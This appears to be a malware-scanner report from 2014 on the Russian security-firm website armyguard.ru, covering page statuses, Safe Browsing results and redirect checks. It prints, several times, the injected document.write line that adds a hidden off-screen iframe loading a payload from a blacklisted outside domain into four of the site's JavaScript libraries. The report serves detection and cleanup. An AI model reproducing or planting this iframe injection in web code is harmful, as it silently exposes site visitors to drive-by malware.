Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=armyguard.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
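Scanned pages/files (status is per fetched file; an HTML page listed as clean can still load one of the scripts listed as malicious below. In each flagged script the same document.write(...) statement follows the end of the original library code, so comparing the file with a known-good copy of the library isolates the injected line.)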
Request | Server response | Status |
http://armyguard.ru/ | 200 OK Content-Length: 15608 Content-Type: text/html | clean |
http://armyguard.ru/dogovor-na-okazanie-ochrannich-uslug-dogovor-ochrannich-uslug | 200 OK Content-Length: 16521 Content-Type: text/html | clean |
http://armyguard.ru/vakansii | 200 OK Content-Length: 11815 Content-Type: text/html | clean |
http://armyguard.ru/stoimost-ochrannich-uslug | 200 OK Content-Length: 17427 Content-Type: text/html | clean |
http://armyguard.ru/otzivi | 200 OK Content-Length: 14746 Content-Type: text/html | clean |
http://armyguard.ru/litsenzii | 200 OK Content-Length: 14045 Content-Type: text/html | clean |
http://armyguard.ru/modules/mod_jt_slideshow/scripts/jquery.js | 200 OK Content-Length: 57456 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: oktafya.wikaba.com ...[59433 bytes skipped]... |document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Malicious iFrame found. size: 100x100 src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||
http://armyguard.ru/modules/mod_jt_slideshow/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 29031 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[28185 bytes skipped]... ount||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Antivirus reports:
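Malicious iFrame found. size: 100x100 (the inline style sets 100x100 over the width="55" height="55" attributes, and position:absolute with left:-100px places the frame off the left edge of the page, so it is not visible to the visitor) src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious. <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||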
http://armyguard.ru/kontakti | 200 OK Content-Length: 12724 Content-Type: text/html | clean |
http://armyguard.ru/components/com_ckforms/js/calendar.js | 200 OK Content-Length: 16030 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: oktafya.wikaba.com ...[15919 bytes skipped]... =E&&!B.contains(I)){return I}})}else{H=[];for(var C=G;C<=E;C++){if(!B.contains(C)){H.push(C)}}}H.sort(this.sort);return{days:H,months:A,years:D}},write:function(A){this.rebuild(A);A.els.each(function(B){B.value=this.format(A.val,B.format)},this)}});Calendar.implement(new Events,new Options); ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Malicious iFrame found. size: 100x100 src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||
http://armyguard.ru/components/com_ckforms/js/formcheck.js | 200 OK Content-Length: 30607 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[21748 bytes skipped]... function(el) { if(!this.manageError(el,'submit')) this.form.isValid = false; }, this); (this.form.isValid) ? (this.options.submitByAjax) ? this.submitByAjax() : this.form.submit() : this.focusOnError(this.firstError); } }); FormCheck.implement(new Options());;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 100x100 src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||
http://armyguard.ru/ochrana-zhilich-domov | 200 OK Content-Length: 12229 Content-Type: text/html | clean |
http://armyguard.ru/ochrana-avtopredpriyatiy/ochrana-avtopredpriyatiy-avtoservisov-avtostoyanok-parkovok-i-avtozapravochnich-stantsiy | 200 OK Content-Length: 11463 Content-Type: text/html | clean |
http://armyguard.ru/ochrana-ofisov-v-moskve | 200 OK Content-Length: 12356 Content-Type: text/html | clean |
http://armyguard.ru/ochrana-magazinov-torgovich-tsentrov | 200 OK Content-Length: 12314 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: armyguard.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 19:57:18 GMT
Pragma: no-cache
Server: nginx/Zenon
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 27 Jun 2014 19:57:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 36b47f348ec1213be68e7a2400489069=tujpler96063uhhkq9kvb26vj6; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: armyguard.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 19:57:18 GMT
Pragma: no-cache
Server: nginx/Zenon
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 27 Jun 2014 19:57:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 36b47f348ec1213be68e7a2400489069=tujpler96063uhhkq9kvb26vj6; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: armyguard.ru
Referer: http://www.google.com/search?q=armyguard.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: armyguard.ru
Referer: http://www.google.com/search?q=armyguard.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.